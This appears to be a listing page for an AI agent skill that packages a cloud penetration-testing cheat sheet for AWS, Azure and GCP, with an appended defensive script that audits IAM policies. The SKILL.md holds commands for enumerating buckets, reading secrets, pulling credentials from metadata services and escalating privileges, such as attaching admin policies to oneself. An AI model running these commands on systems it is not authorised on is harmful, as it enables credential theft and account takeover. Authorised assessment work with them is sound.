exploiting-cloud-platforms
Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.
Best use case
exploiting-cloud-platforms is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Teams using exploiting-cloud-platforms should expect more consistent output, faster repeated execution, and less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in .claude/skills/exploiting-cloud-platforms/SKILL.md inside your project
- Restart your AI agent — it will auto-discover the skill
How exploiting-cloud-platforms Compares
| Feature / Agent | exploiting-cloud-platforms | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Exploiting Cloud Platforms

## When to Use

- AWS, Azure, or GCP security assessment
- Cloud misconfiguration exploitation
- S3/Blob/Storage bucket hunting
- Cloud IAM privilege escalation
- Serverless function exploitation
- Cloud metadata service abuse

## AWS Security

### AWS CLI Setup

```bash
# Configure credentials
aws configure

# Or export directly
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1

# Test credentials
aws sts get-caller-identity

# List available regions
aws ec2 describe-regions
```

### S3 Bucket Enumeration

```bash
# List buckets
aws s3 ls

# List bucket contents
aws s3 ls s3://bucket-name/
aws s3 ls s3://bucket-name/ --recursive

# Download bucket contents
aws s3 sync s3://bucket-name/ ./local-folder/

# Check public access
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name

# Test unauthenticated access
aws s3 ls s3://bucket-name/ --no-sign-request
curl https://bucket-name.s3.amazonaws.com/
```

**S3 Bucket Discovery:**

```bash
# Common naming patterns
company-backup
company-data
company-dev
company-prod
company-logs
company-assets

# Tools
# s3scanner
python3 s3scanner.py buckets.txt

# S3 Inspector
python3 s3inspector.py --bucket-file buckets.txt
```

### IAM Enumeration

```bash
# Current user info
aws sts get-caller-identity

# List IAM users (if allowed)
aws iam list-users

# List user policies
aws iam list-attached-user-policies --user-name username
aws iam list-user-policies --user-name username

# Get policy details
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName
aws iam get-policy-version --policy-arn arn --version-id v1

# List roles
aws iam list-roles

# List groups
aws iam list-groups
```

### EC2 Enumeration

```bash
# List instances
aws ec2 describe-instances

# Get instance metadata (from instance)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name

# List security groups
aws ec2 describe-security-groups

# List key pairs
aws ec2 describe-key-pairs

# List snapshots
aws ec2 describe-snapshots --owner-ids self

# Public snapshots by account
aws ec2 describe-snapshots --owner-ids 123456789012 --restorable-by-user-ids all
```

### Lambda Functions

```bash
# List functions
aws lambda list-functions

# Get function code
aws lambda get-function --function-name function-name

# Invoke function
aws lambda invoke --function-name function-name output.txt

# Get function configuration
aws lambda get-function-configuration --function-name function-name
```

### RDS Enumeration

```bash
# List DB instances
aws rds describe-db-instances

# List DB snapshots
aws rds describe-db-snapshots

# Check if publicly accessible
aws rds describe-db-instances --query 'DBInstances[*].[DBInstanceIdentifier,PubliclyAccessible]'
```

### Secrets Manager

```bash
# List secrets
aws secretsmanager list-secrets

# Get secret value
aws secretsmanager get-secret-value --secret-id secret-name
```

### CloudTrail (Logging)

```bash
# Check if CloudTrail is enabled
aws cloudtrail describe-trails

# Check trail status
aws cloudtrail get-trail-status --name trail-name

# Get recent events
aws cloudtrail lookup-events
```

### AWS Privilege Escalation

**Common Misconfigurations:**

```bash
# iam:CreatePolicyVersion - modify existing policies
# iam:SetDefaultPolicyVersion - set older policy version
# iam:PassRole + lambda:CreateFunction - execute code as role
# iam:AttachUserPolicy - attach admin policy to self
# iam:PutUserPolicy - add inline policy to self
# iam:CreateAccessKey - create keys for other users
# iam:UpdateAssumeRolePolicy - modify trust relationships
```

**Exploitation Examples:**

```bash
# Create access key for admin user (if iam:CreateAccessKey)
aws iam create-access-key --user-name admin-user

# Attach admin policy (if iam:AttachUserPolicy)
aws iam attach-user-policy --user-name current-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# PassRole + Lambda
aws lambda create-function --function-name evil --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/AdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name evil output.txt
```

## Azure Security

### Azure CLI Setup

```bash
# Login
az login

# Login with service principal
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID

# Get current account
az account show

# List subscriptions
az account list
```

### Blob Storage Enumeration

```bash
# List storage accounts
az storage account list

# List containers
az storage container list --account-name accountname

# List blobs
az storage blob list --container-name containername --account-name accountname

# Download blob
az storage blob download --container-name containername --name filename --account-name accountname

# Check public access
az storage container show --name containername --account-name accountname

# Test unauthenticated access
curl https://accountname.blob.core.windows.net/container/file
```

**Blob Discovery:**

```bash
# Common patterns
companyname
companyname-backup
companyname-data
companyname-files

# MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Base company
```

### VM Enumeration

```bash
# List VMs
az vm list

# List VM images
az vm image list

# Get VM details
az vm show --resource-group RG --name VMname

# List NICs
az network nic list

# List public IPs
az network public-ip list
```

### Azure AD Enumeration

```bash
# List users
az ad user list

# Get current user
az ad signed-in-user show

# List groups
az ad group list

# List service principals
az ad sp list

# List applications
az ad app list
```

### Function Apps

```bash
# List function apps
az functionapp list

# Get function app details
az functionapp show --name functionappname --resource-group RG

# List functions
az functionapp function list --name functionappname --resource-group RG

# Download function code
az functionapp deployment source config-zip --name functionappname --resource-group RG
```

### Key Vault

```bash
# List key vaults
az keyvault list

# List secrets
az keyvault secret list --vault-name vaultname

# Get secret
az keyvault secret show --name secretname --vault-name vaultname
```

### Azure Metadata Service

```bash
# From Azure VM
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# Get access token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```

## GCP Security

### gcloud Setup

```bash
# Login
gcloud auth login

# Login with service account
gcloud auth activate-service-account --key-file=key.json

# Get current account
gcloud config list

# List projects
gcloud projects list
```

### Storage Bucket Enumeration

```bash
# List buckets
gsutil ls

# List bucket contents
gsutil ls gs://bucket-name/

# Download files
gsutil cp gs://bucket-name/file.txt ./

# Check bucket permissions
gsutil iam get gs://bucket-name/

# Test unauthenticated access
curl https://storage.googleapis.com/bucket-name/file.txt
```

**Bucket Discovery:**

```bash
# Common patterns
company-backup
company-data
company_backup
company_data

# GCPBucketBrute
python3 gcpbucketbrute.py -k company
```

### Compute Engine

```bash
# List instances
gcloud compute instances list

# Get instance details
gcloud compute instances describe instance-name --zone=zone

# List disks
gcloud compute disks list

# List snapshots
gcloud compute snapshots list

# List firewall rules
gcloud compute firewall-rules list
```

### IAM Enumeration

```bash
# List service accounts
gcloud iam service-accounts list

# Get IAM policy
gcloud projects get-iam-policy PROJECT_ID

# List roles
gcloud iam roles list

# Describe role
gcloud iam roles describe roles/editor
```

### Cloud Functions

```bash
# List functions
gcloud functions list

# Describe function
gcloud functions describe function-name --region=region

# Download source code (if accessible)
gcloud functions describe function-name --region=region --format="value(sourceArchiveUrl)"
```

### GCP Metadata Service

```bash
# From GCP VM
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"

# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"
```

## Cloud Exploitation Tools

**AWS:**

```bash
# Pacu - AWS exploitation framework
python3 pacu.py

# ScoutSuite - Security auditing
python3 scout.py aws

# Prowler - Security assessment
./prowler -M csv

# WeirdAAL - AWS attack library
python3 weirdAAL.py
```

**Azure:**

```bash
# MicroBurst - PowerShell toolkit
Import-Module MicroBurst.psm1
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains

# ScoutSuite
python3 scout.py azure

# ROADtools - Azure AD
roadrecon auth
roadrecon gather
roadrecon gui
```

**GCP:**

```bash
# ScoutSuite
python3 scout.py gcp

# GCP-IAM-Privilege-Escalation
# Check for privilege escalation paths
```

## Quick Cloud Wins

**AWS:**

- Public S3 buckets with sensitive data
- Overly permissive IAM policies
- Unencrypted snapshots
- Public RDS instances
- Lambda functions with secrets in environment variables
- EC2 metadata service abuse (SSRF)

**Azure:**

- Public blob storage containers
- Overly permissive RBAC
- Exposed Key Vault secrets
- Public-facing VMs with weak credentials
- Function apps with hardcoded secrets

**GCP:**

- Public storage buckets
- Overly permissive IAM bindings
- Public compute instances
- Service account key exposure
- Cloud Functions with secrets in code

## Common Cloud Misconfigurations

1. **Public Storage** - S3/Blob/GCS buckets with public read/write
2. **Excessive Permissions** - Overly permissive IAM/RBAC policies
3. **Exposed Secrets** - Keys/passwords in code, environment variables
4. **No MFA** - Critical accounts without multi-factor authentication
5. **Open Security Groups** - 0.0.0.0/0 access on sensitive ports
6. **Unencrypted Data** - Storage/databases without encryption
7. **Default Credentials** - Services using default passwords
8. **Exposed Metadata** - SSRF to cloud metadata services
9. **Public Snapshots** - EBS/disk snapshots publicly accessible
10. **CloudTrail Disabled** - No logging of API calls

## References

- https://book.hacktricks.xyz/pentesting-web/buckets
- https://github.com/RhinoSecurityLabs/pacu
- https://github.com/NetSPI/MicroBurst
- https://github.com/nccgroup/ScoutSuite
- https://cloudsecdocs.com/
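
As a defensive counterpart to the permissions listed under "AWS Privilege Escalation" above, this added example (not part of the original SKILL.md) flags identity policies whose Allow statements grant them, including through wildcards. The sample policy and the names `SINGLE`, `COMBOS`, `allowed_patterns`, `grants` and `audit` are constructed for illustration; Deny statements, `NotAction`, resource scoping and conditions are not evaluated, so treat the output as a first-pass review list rather than a full policy evaluation.

```python
import fnmatch

# Permissions the page lists under "AWS Privilege Escalation".
SINGLE = [
    "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
    "iam:AttachUserPolicy", "iam:PutUserPolicy",
    "iam:CreateAccessKey", "iam:UpdateAssumeRolePolicy",
]
# Listed as a pair: flagged only when one policy allows both.
COMBOS = [("iam:PassRole", "lambda:CreateFunction")]

# Constructed sample policy, not taken from any real account.
SAMPLE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["s3:GetObject", "iam:Create*"], "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"},
    {"Effect": "Allow", "Action": "lambda:*", "Resource": "*"},
    {"Effect": "Deny", "Action": "iam:AttachUserPolicy", "Resource": "*"},
]}

def allowed_patterns(policy):
    """Collect Action patterns from Allow statements only."""
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare object
        statements = [statements]
    patterns = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])  # NotAction statements are skipped
        patterns += [actions] if isinstance(actions, str) else list(actions)
    return patterns

def grants(patterns, action):
    """IAM action names are case-insensitive and support * and ? wildcards."""
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)

def audit(policy):
    """Return the listed escalation permissions this policy allows."""
    patterns = allowed_patterns(policy)
    findings = [a for a in SINGLE if grants(patterns, a)]
    for combo in COMBOS:
        if all(grants(patterns, a) for a in combo):
            findings.append(" + ".join(combo))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_POLICY):
        print("REVIEW:", finding)
```

Feed it the `Document` returned by `aws iam get-policy-version` for each attached policy; any finding is a candidate for tighter action lists or resource scoping.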